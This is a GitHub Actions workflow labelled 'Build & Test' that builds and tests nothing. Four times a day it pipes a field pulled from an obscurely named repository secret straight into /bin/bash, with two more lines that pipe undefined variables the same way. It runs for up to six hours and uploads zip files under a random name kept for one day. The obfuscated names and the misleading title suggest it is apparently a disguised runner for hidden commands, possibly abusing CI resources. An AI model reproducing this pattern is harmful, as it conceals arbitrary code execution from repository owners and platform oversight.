name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '38 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          fjlh4: ${{ secrets.fjlh4 }}
        run: |
          printf '%s' "$fjlh4" | jq -r .oyax98549 | /bin/bash
          echo $r714 | jq -r .uubul4 | /bin/bash
          printf '%s' "$thwmj969" | jq -r .c37 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 9u6ZmHuq
          path: "*.zip"
          retention-days: 1
